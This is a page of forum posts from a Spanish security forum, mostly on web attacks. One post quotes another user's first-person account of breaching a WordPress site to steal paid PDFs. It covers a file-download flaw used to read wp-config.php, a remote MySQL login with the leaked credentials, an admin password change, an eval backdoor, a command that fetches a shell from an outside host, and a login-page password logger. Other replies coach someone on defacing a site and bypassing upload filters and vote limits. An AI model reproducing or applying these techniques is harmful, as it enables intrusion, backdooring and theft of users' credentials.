elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 [2] 3 4 5 6 7 8
11  Seguridad Informática / Nivel Web / Re: necesito ayuda con un deface, tengo la pass admin pero no puedo subir la shell en: 25 Agosto 2012, 14:07 pm
content-type
.php3

y deben haber mas, hay que variar, y intenta generar un error, metiendo caracteres raros, y tambien variando el largo de la cadena, para ver si tienes algun tipo de informacion, tambn localiza donde sube los ficheros utilizando algun dork , onda site:porno.com ext:pdf ,.

por cierto pense que habia sido un sqli, y cuando hablaba de privilegios, me referia a los privilegios del DBMS :p .

suerte!!,
12  Seguridad Informática / Nivel Web / Re: necesito ayuda con un deface, tengo la pass admin pero no puedo subir la shell en: 25 Agosto 2012, 06:40 am
la parte dificil es esta, ya que cualquier persona con CERO conocimientos puede encontrar los datos del administrador en una pagina vulnerable a SQLI.


ahora te toca aprender que es una peticion HTTP y ver si por ahi se puede hacer algo, creo que modificando el ??????????? podria saltar la proteccion, creo que tambien con la extension ???3 en
algunos casos se podria saltar la proteccion.

a todo esto sabes si el script que guarda el archivo , renombra el archivo despues de subir??, intentaste provocar un error, para ver si puedes sacar un discloure del PATH o el nombre del archivo como lo intenta guardar ??, revisaste los privilegios que tiene el usario actual del DBMS que realiza las consultaS ??, probaste leyendo archivos del servidor con consultas ?? , intentaste crear archivos en el servidor con consultas?? ..

falta la parte dificil, la que algun dia puede hacer la diferencia entre tu y el que esta a tu lado, es la parte
de aprender a razonar y entender como funcionan las cosas, y lo mas importante PARA QUE QUIERO COLOCAR UN DEFACE EN UNA PAGINA ?? .

te dejo ??? de tarea para la casa ;) , pero de que te ayude lo hize :p .
13  Seguridad Informática / Nivel Web / Re: duda sobre error_reporting y SQLi en: 23 Agosto 2012, 00:30 am
cuando no hay argumentos,no queda de otra  :rolleyes:
14  Seguridad Informática / Nivel Web / Re: duda sobre error_reporting y SQLi en: 22 Agosto 2012, 04:25 am
Claro hay muchísimos ataques que se basan en errores, pero estas hablando en general, en este caso nos referimos a errores de programación a nivel web y mayormente los errores que se provocan al nivel web son errores de sintaxis, las otra parte de errores son bug's en algunas funciones que hacen que provoquen error.

En este tema abarca, lenguajes que se ejecutan al lado del cliente como javascript y los del lado del servidor PHP, Python, Perl, Java, etc... Porque si atacamos a los servicios que corren en un servidor ya es otro tema esa.

Si estas buscando vulnerabilidades en un CMS de PHP, como por ejemplo SMF y comienzas a tratar de provocar errores para poder encontrar vulnerabilidades, vas MUY MAL.

Recordando claro que en este tema se hablo sobre error_reporting que es una función de PHP y de SQLI, así que el tema circula sobre PHP.

Saludos.

entonces que pinta la lamerada que describiste, sacaste de contexto la pregunta, para describir un super 'CUACKeo' .

por cierto quien dice que algo esta bien o mal ??, seria logico tratar de ingresar 100 veces como ROOT
a un DBMSMYSQL con la misma contraseña ??, hay muchas cosas que te podria nombrar que pinta para mal, pero al fin  al cabo termina por buen camino ;) .

como dices la pregunta va por la función error_reporting , y creo que es totalmente recomendable tener control absoluto de todos los errores, SEA LO QUE SEA.

  :D
15  Comunicaciones / Redes / capturar sesion MYSQL en local ? [DUDA] en: 22 Agosto 2012, 01:02 am
escribo ya que tengo un problema, me encuentro utilizando backtrack5 r2 y lo que quiero, es realizar unas pruebas capturando el trafico que genera el cliente MYSQL con el servidor MYSQL.

escenario:
a)tengo instalado tanto el cliente como el servidor en la misma maquina(localhost).
b)tengo 2 tarjetas de red conectadas(por otras razones) mas la interfaz loopback.

utilizo ngrep( tambien probe con wireshark ), de la siguiente forma.

ngrep -d lo -W byline port 3306 and host localhost

lo => loopback , tambien e intentado con wlan1 y con wlan2(tengo claro que no deberia pasa nada, solo era de prueba :p ).

y no agarra niun solo paquete, luego probe

ngrep -d lo -W byline host localhost

y tampoco agarra paquetes del protocolo MYSQL, intente con un PING al localhost y captura el trafico del PING perfectamente.

el servidor esta escuchando en el puerto 3306 y el intento de conexion tambn es por ahi, asique no creo que por ahi vaya el problema :/ .

alguien me puede decir que pasa en este caso ?? , al ser localhost, utilizara otro medio que no sea socket para conectarse ?? .

EDIT: se me olvidaba decir, que al utilizar el NETCAT ( nc -vv 127.0.0.1 3306 ) , captura perfectamente el trafico :/ .

saludos.  >:D
16  Seguridad Informática / Nivel Web / Re: duda sobre error_reporting y SQLi en: 22 Agosto 2012, 00:59 am
Código:
[code]
Un error de PHP no indica que una web es vulnerable, pero si se provoca el error de forma concierte puede indicar que la web es vulnerable como en el caso de SQLI. Pero en lo personal, la peor forma de buscar vulnerabilidades es a partir de provocaciones de error, porque simplemente no sabe lo que hace.

La mejor formar, es saber qué por si solo un código PHP no se vulnera/explota así mismo, el problema viene cuando el sistema necesita utilizar información dada por el usuario, entonce hay que verificar hacia donde va la información, en que parte se utilizas y cuando conozcas hacia donde va y como utiliza la información, y sepas como funciona todo, tendrás que pensar en alguna forma de manipular la información, de forma que realice una acción que desees.

Para esto no vale que sepas SQLI, LFI, RFI, XSS o hagas una lista de todas las vulnerabilidades que conoces y la vayas descartando cada una. Aqui vale la logica y mientra mejor sea tu nivel de programación, mas rápido detectaras errores lógicos que puedas aprovecharte y vale mucho los trucos que sepas.


Por ejemplo, hace como 1 mes estaba navegando por internet, buscando un tipo de información especifica (nada de programación, hacking ni nada similar, algo personal), encontré una pagina muy buena, que vendía un material en PDF. Me puse a navegar, a ver si encuentro el archivo por hay y nada. Entonce opte por ingresar a su servidor y bajarme el archivo PDF directamente.

La web estaba en wordpress. Revisando los post, encontré un post que hacia una descarga directa a un archivo que tenia de muestra, este archivo tenia un parámetro, que se utilizaba para descargar un archivo especifico y bueno, le quite el parametro de forma que quede el archivo solo: web.com/archivo.php y me hizo una descarga directa al archivo.php y bueno este es el codigo del archivo.php.

Código
  1. <?php
  2.    $f = $_GET["f"];
  3.    header("Content-type: application/octet-stream");
  4.    header("Content-Disposition: attachment; filename=\"$f\"\n");
  5.    $fp=fopen("$f", "r");
  6.    fpassthru($fp);
  7. ?>

Como el sistema que utilizaba era wordpress, descarge el archivo wp-config.php con la idea de conectarme remotamente por MYSQL, recordando que el archivo.php, se encontraba en la raiz del servidor y el archivo wp-config.php tambien se encuentra en la raiz, solo debi pasar el parámetro del archivo wp-config.php

web.com/archivo.php?f=wp-config.php

Descarge el archivo wp-config.php
Código
  1. // ** Ajustes de MySQL. Solicita estos datos a tu proveedor de alojamiento web. ** //
  2. /** El nombre de tu base de datos de WordPress */
  3. define('DB_NAME', 'wp_sys');
  4.  
  5. /** Tu nombre de usuario de MySQL */
  6. define('DB_USER', 'user_bd');
  7.  
  8. /** Tu contraseña de MySQL */
  9. define('DB_PASSWORD', 'MysqlPass');
  10.  
  11. /** Host de MySQL (es muy probable que no necesites cambiarlo) */
  12. define('DB_HOST', 'localhost');
  13.  

Luego me conecte de forma remota a la base de datos MYSQL, primero que nada le hice un ping a la web para conocer su IP para así pasarle el parámetro.

Código
  1. yoya@Debian:~$ mysql -h 182.94.110.121 --user=user_bd --password=MysqlPass
  2. Welcome TO the MySQL monitor.  Commands END WITH ; OR \g.
  3. Your MySQL connection id IS 1125935
  4. Server version: 5.1.38-log SOURCE distribution
  5.  
  6. Copyright (c) 2000, 2011, Oracle AND/OR its affiliates. ALL rights reserved.
  7.  
  8. Oracle IS a registered trademark OF Oracle Corporation AND/OR its
  9. affiliates. Other names may be trademarks OF their respective
  10. owners.
  11.  
  12. TYPE 'help;' OR '\h' FOR help. TYPE '\c' TO clear the CURRENT INPUT statement.
  13.  
  14. mysql> USE wp_sys;
  15. DATABASE changed
  16. mysql> SHOW TABLES;
  17. +-----------------------+
  18. | Tables_in_wp_sys      |
  19. +-----------------------+
  20. | wp_commentmeta        |
  21. | wp_comments           |
  22. | wp_links              |
  23. | wp_options            |
  24. | wp_postmeta           |
  25. | wp_posts              |
  26. | wp_snews_members      |
  27. | wp_term_relationships |
  28. | wp_term_taxonomy      |
  29. | wp_terms              |
  30. | wp_usermeta           |
  31. | wp_users              |
  32. +-----------------------+
  33. 12 ROWS IN SET (0.18 sec)
  34.  
  35. mysql>

Bueno luego cambie la password del admin, por el mio para poder entrar a la administración y subir shell. Recordando que wordpress, utiliza phpass, el password que utilice debe ser un password phpass para que funcione.

Lo cambie y todo, entre al sistema de administración de WordPress, me fui al lado de los plugins y había un editor de archivo y le agregue esta linea
Código
  1. <?php eval($_GET['e']); ?>
.

Y bueno ahora subi la SHELL.

Código
  1. web.com/wp-plugin/pluginNAME/file.php?e=file_put_contents('shell.php',file_get_contents('http://www.example.com/shell.txt'));

Y bueno ahora solo queda ir a la dirección de la SHELL que seria:

Código:
web.com/wp-plugin/pluginNAME/shell.php

Y bueno ya tenia la shell en el servidor, pero me fije que el archivo no se encontraba en ese servidor sino en otro que tenia, en ese otro servidor tenia otros documentos para vender, y el otro servidor usa WordPress y de casualidad tiene el mismo archivo de descarga en el mismo lugar.

Hice lo mismo paso de arriba pero con la diferencia, en que no me permite la conexión MYSQL remotamente.

Luego se me ocurrió probar entrar a la administración con el mismo pass que utiliza el administrador en su primera web (en la que pude subir shell), y bueno se me ocurrió capturar su password en texto plano, así no tengo que descifrar sus el hash generado por phpass y ahorrarme muchísimo tiempo.

Agregue esta linea al archivo wp-login.php
Código
  1. <?php
  2. if(!empty($_POST['wp-submit']) && !empty($_POST['log']) && !empty($_POST['pwd'])) {
  3.  
  4.    if($_POST['wp-submit'] == 'Acceder') {
  5.  
  6.    $f = fopen('wp.txt',"a");
  7.     fputs($f, $_POST['log'].':'.$_POST['pwd']."\n");
  8.  
  9.    fclose($f);
  10. }}
  11. ?>

Cada vez que alguien intente loguearse, capturare su usuario y password y creare un archivo wp.txt con su user y pass, para luego revisarlo, la estructura del archivo wp.txt es la siguiente:

Código:
user:pass
Anonww:wwxDDF

He hecho unos testeo haber si todo marcha a la perfeccion y si, todo va bien pero todavia no he capturado su usuario y pass pero el ha posteado varias veces. Supongo que es porque la primera vez que se logueo le dio a recordar y por eso no ha tenido que ingresar su usuario y password, o puede ser que al introducir datos correctos, no llegue a pasar por esa linea de codigo y por lo tanto nunca llega a guardar su usuario y password. Luego tendre que hacer unas pruebas, haber porque solo me captura el usuario y password cuando me intento loguear con datos incorrecto.

Saludos.

fxf

una de las fases antes de realizar un PENTEST es recolectar información tanto por FOOTPRINTING o FINGERPRINT, y provocar un error muchas veces suele dar datos muy jugosos como un PATH, sqli basadas en errores,IP's,version del servidor etc.. , claro está que evitando estos en muchos casos no conseguiras mitigar ataques pero creo que es una buena forma de hacer las cosas. ;)

por cierto hay muchos ataques que se basan en errores, tanto de programacion como de configuracion del servidor.

17  Seguridad Informática / Nivel Web / Re: SQLInjection sin acceso a information_schema en: 11 Agosto 2012, 07:17 am
La 4.1.20 de MySql

2 cosas.

1) la base de datos schema se implementa desde la version 5 de MYSQL, por ende no la tienes, y generalmente ese tipo de sql injection se hace con fuerza bruta, desconozco si es posible sacarla como un blind sql injection(lo dudo).

2)actualiza MYSQL, recuerda que hace poco se demostro, que habian versiones de MYSQL donde se podian loguear como root sin tener la passwd de root.

revisa este link:
http://www.securitybydefault.com/2012/06/vulnerabilidad-grave-en-mysqlmariadb.html

suerte!!
18  Seguridad Informática / Nivel Web / Re: Ayuda!!! en: 9 Agosto 2012, 04:00 am
un dia  implemente el protocolo sock5(no es necesario implementarlo ya que hay librerias) en python, para realizar algo parecido, me conectaba a travez de tor, y realizaba las peticiones HTTP a traves de SOCK5.

ahora como no quieres utilizar tor, te aconsejo que implementes un cliente proxy HTTP en python(no es dificil), y te buscas una buena lista de proxys, anonimos, y realizas las conexiones a traves de la lista de proxy.

antes de realizar esto, te aconsejo revisar bn la pagina, ya que puede ser posible que agregando/cambiando un simple parametro de la peticion HTTP( X-Forwarded-For o X-Real-IP ), puedas validar los votos.


saludos.



19  Seguridad Informática / Bugs y Exploits / Re: script perl "Al descubierto" en: 17 Julio 2012, 03:35 am
enviale la IP de la policia PERUANA , nos harías un gran favor !!

 :silbar:

saludos.
20  Seguridad Informática / Bugs y Exploits / Re: script perl "Al descubierto" en: 16 Julio 2012, 02:09 am
bueno este es la ultima que te respondo.

R.- Eres un wn ignorante.  :laugh:

saludos.
Páginas: 1 [2] 3 4 5 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines